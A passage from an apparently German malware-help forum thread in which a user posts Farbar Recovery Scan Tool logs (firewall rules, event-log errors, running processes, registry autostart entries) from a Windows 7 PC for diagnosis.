FirewallRules: [{750C88E5-8449-4ED6-87F6-6F9A40C73F22}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe FirewallRules: [{72A3B8D8-259B-478D-8EA1-E3F979D8CA18}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{81B1EC25-555A-4F2F-9395-9FD97F51323B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{2C423E45-FD79-468B-B116-1FC2C2477842}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{DA81D9C0-E7D2-4027-B0A5-A8A45C00F77D}] => (Allow) C:\Program Files (x86)\Sony Mobile\Update Engine\Sony Mobile Update Engine.exe FirewallRules: [{521249EF-E21D-4C4E-8C32-FDD3F208B733}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{89E0E88B-D4E4-491D-A414-02FCD1F3D197}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{1C8A9419-FD22-4DAA-A57C-F115A281A979}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{8B608DD6-21BB-4A2E-8800-E7106712C6F0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Half-Life\hl.exe FirewallRules: [{A1CF8413-A121-4594-8D4F-822D997AD1F7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{78D1B940-9035-4A6C-BF79-C39436D455B2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\BFBC2Game.exe FirewallRules: [{9FD597A8-5DF3-405B-BF40-DAD0B4A3D331}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: [{33EBB500-8307-46EF-8E6E-4044649E5550}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Battlefield Bad Company 2\Support\EA Help\Electronic_Arts_Technical_Support.htm FirewallRules: [{B2E37F34-F81A-4758-AE8C-6350303ED76A}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{F8A57BC5-5370-4537-AD73-18A47D9490BA}] => (Allow) C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe FirewallRules: [{396CE83B-463E-4ABD-9DDF-3AAF00CF8FC2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{55CF9D3A-CEA1-4EE1-9710-588133F87671}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForever.exe FirewallRules: [{257241F5-DB72-4BCC-966A-EB960C45A132}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{B075E0A7-AA0A-476A-8E74-51E6DE493C7A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\TrackMania United\TmForeverLauncher.exe FirewallRules: [{FECE91C7-34A5-4011-ACE9-0C45BCC3E776}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{4F4A4AF0-A162-4CDE-A55E-56F506AF9332}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{E2340314-D830-445B-ACFE-84B2490E2D2B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{6E566919-5331-43A5-85E4-7B72D59CEE97}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Source\hl2.exe FirewallRules: [{C86938D2-4623-4413-8927-C89AAE8215B2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{CAB95473-AE42-4A88-A6CD-2019753F6D1F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{8A3B2F36-312E-4CF7-A10A-E8D05CB2FD24}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{707E083B-17A4-43B5-A25F-F911B7A2478B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgmfapx.exe FirewallRules: [{D466720C-AE72-408E-81DB-EF107F94C734}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{875B4892-FDD1-4915-BE18-3D04DCB57C60}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe FirewallRules: [{2BCB0DB0-2EB2-4F78-8EEE-6E29EE0C7CFD}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: [{FCF89AD8-A839-4426-A4C5-771A89F905E3}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgdiagex.exe FirewallRules: [{9B5F71A5-ACE5-483E-8E24-4F704CB2BD56}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [{165D76C1-CFCF-4A31-95F2-57AD4831602B}] => (Allow) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe FirewallRules: [TCP Query User{11D72B15-04AE-4224-98D0-4E863D33585C}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [UDP Query User{1E3DB40B-BE9E-42A4-8A07-6F1460C15F3A}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe FirewallRules: [TCP Query User{99D93149-D86B-4104-94D4-75AB15AAEBB6}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [UDP Query User{32F3CAD3-4F49-4157-A353-BC565EEB431F}C:\program files (x86)\libreoffice 4\program\soffice.bin] => (Allow) C:\program files (x86)\libreoffice 4\program\soffice.bin FirewallRules: [{48969429-133A-4C3A-96AA-517EE6CD1645}] => (Allow) C:\Program Files (x86)\Max Driver Updater\maxdu.exe FirewallRules: [{FBEF1CE7-BE0B-4061-BD5F-A3965CC65AD6}] => (Allow) D:\Verkauf\powerpoint\Office15\outlook.exe FirewallRules: [{FBF0ABCC-062A-4B94-887D-CA8EC51DD4BC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{9B7A0074-94B2-4650-9597-31794BEE9247}] => (Allow) D:\Wuala\microsoft office\Office12\outlook.exe FirewallRules: [{CE870A15-9C31-4DCF-BD3B-B42479BD0CE2}] => (Allow) D:\Wuala\microsoft office\Office12\GROOVE.EXE FirewallRules: [{56AF879B-0A7D-4EBB-849F-6EDCFB794698}] => (Allow) D:\Wuala\microsoft office\Office12\GROOVE.EXE FirewallRules: [{666FC075-A8C4-4DE7-BE15-13B132792113}] => (Allow) D:\Wuala\microsoft office\Office12\ONENOTE.EXE FirewallRules: [{AFE0148D-6233-4B7C-899B-A6B662765CBE}] => (Allow) D:\Wuala\microsoft office\Office12\ONENOTE.EXE ==================== Fehlerhafte Geräte im Gerätemanager ============= ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (09/28/2015 10:52:33 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 10:01:47 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 10:01:42 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 09:59:44 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 09:56:46 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"1". Die abhängige Assemblierung "Resources32,processorArchitecture="x86",type="win32",version="2.7.4.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". Error: (09/28/2015 07:34:23 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 07:34:20 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 07:34:17 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 06:13:43 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Error: (09/28/2015 06:13:13 PM) (Source: SideBySide) (EventID: 80) (User: ) Description: Fehler beim Generieren des Aktivierungskontexts für "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest1". Fehler in Manifest- oder Richtliniendatei "C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest2" in Zeile C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest3. Eine für die Anwendung erforderliche Komponentenversion steht in Konflikt mit einer anderen, bereits aktiven Komponentenversion. In Konflikt stehende Komponenten:. Komponente 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac.manifest. Komponente 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2.manifest. Systemfehler: ============= Error: (09/29/2015 09:44:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "IE Search Set" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (09/29/2015 09:44:30 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "LavasoftTcpService" wurde aufgrund folgenden Fehlers nicht gestartet: %%2 Error: (09/29/2015 09:42:55 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "Windows Modules Installer" wurde aufgrund folgenden Fehlers nicht gestartet: %%1069 Error: (09/29/2015 09:42:55 AM) (Source: Service Control Manager) (EventID: 7038) (User: ) Description: Der Dienst "TrustedInstaller" konnte sich nicht als "NT AUTHORITY\SYSTEM" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: %%50 Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC). Error: (09/29/2015 09:41:27 AM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler: %%1056 Error: (09/29/2015 09:41:26 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {9E175B6D-F52A-11D8-B9A5-505054503030} Error: (09/29/2015 09:40:57 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "Windows Media Player-Netzwerkfreigabedienst" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts. Error: (09/29/2015 09:40:57 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "CyberGhost 5 Client Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. Error: (09/29/2015 09:40:57 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Der Dienst "Apple Mobile Device" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 60000 Millisekunden durchgeführt: Neustart des Diensts. Error: (09/29/2015 09:40:56 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Dienst "Adobe Acrobat Update Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert. CodeIntegrity: =================================== Date: 2015-09-21 18:26:06.410 Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert. Date: 2015-09-21 18:26:06.394 Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume1\ComboFix\catchme.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert. Date: 2015-09-09 00:48:00.156 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.111 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.054 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:48:00.010 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpa.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.933 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.879 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.840 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. Date: 2015-09-09 00:47:59.785 Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume1\Program Files (x86)\AVG\AVG PC TuneUp\avgdumpx.exe" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde. ==================== Speicherinformationen =========================== Prozessor: AMD Athlon(tm) 64 X2 Dual Core Processor 4600+ Prozentuale Nutzung des RAM: 77% Installierter physikalischer RAM: 4094.49 MB Verfügbarer physikalischer RAM: 919.03 MB Summe virtueller Speicher: 8187.18 MB Verfügbarer virtueller Speicher: 5142.03 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:186.31 GB) (Free:75.85 GB) NTFS ==>[Laufwerk mit Startkomponenten (eingeholt von BCD)] Drive d: (Data) (Fixed) (Total:698.63 GB) (Free:482.62 GB) NTFS Drive e: (OFFICE12) (CDROM) (Total:0.56 GB) (Free:0 GB) CDFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 186.3 GB) (Disk ID: 500D500D) Partition 1: (Active) - (Size=186.3 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (MBR Code: Windows XP) (Size: 698.6 GB) (Disk ID: 7F4B721C) Partition 1: (Not Active) - (Size=698.6 GB) - (Type=07 NTFS) ==================== Ende von Addition.txt ============================ |
29.09.2015, 14:16 | #15 |
| Malware-gen, Adware-gen ...usw FRST Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:23-09-2015 durchgeführt von Kenny G (Administrator) auf KENNYG-PC (29-09-2015 09:47:21) Gestartet von C:\Users\Kenny G\Downloads Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium) Platform: Windows 7 Ultimate Service Pack 1 (X64) Sprache: Deutsch (Deutschland) Internet Explorer Version 8 (Standard-Browser: FF) Start-Modus: Normal Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Prozesse (Nicht auf der Ausnahmeliste) ================= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.) (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgfws.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe () C:\Windows\SysWOW64\PnkBstrA.exe (CyberGhost S.R.L) C:\Program Files\CyberGhost 5\Service.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (Microsoft Corporation) C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_afdaac81905bf900\explorer.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\NvTmru.exe (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe (Microsoft Corporation) C:\Windows\System32\taskmgr.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe ==================== Registry (Nicht auf der Ausnahmeliste) =========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.) HKLM\...\Run: [Nvtmru] => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe [1028384 2013-10-18] (NVIDIA Corporation) HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3775912 2015-08-24] (AVG Technologies CZ, s.r.o.) HKLM-x32\...\Run: [GrooveMonitor] => D:\Wuala\microsoft office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation) HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd) HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2015-09-23] (Microsoft Corporation) SSODL: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\system32\CbFsMntNtf3.dll (EldoS Corporation) SSODL-x32: EldosMountNotificator - {5FF49FE8-B332-4CB9-B102-FB6951629E55} - C:\Windows\SysWOW64\CbFsMntNtf3.dll (EldoS Corporation) ShellIconOverlayIdentifiers: [0WualaOverlayIcon1] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon2] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon3] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [0WualaOverlayIcon4] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Wuala OverlayIcons\OverlayIcon.dll [2012-05-02] (LaCie AG) ShellIconOverlayIdentifiers: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => 